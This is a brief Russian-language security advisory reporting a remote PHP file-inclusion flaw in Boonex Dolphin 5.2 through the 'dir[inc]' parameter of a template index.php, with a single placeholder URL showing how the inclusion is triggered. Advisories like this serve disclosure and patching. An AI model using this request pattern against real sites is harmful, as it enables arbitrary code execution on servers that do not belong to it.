Программа: Boonex Dolphin 5.2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "dir[inc]" сценарием index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

<host>/<path>/templates/tmpl_dfl/scripts/index.php?dir[inc]=<local/remotefile>

Оставить мнение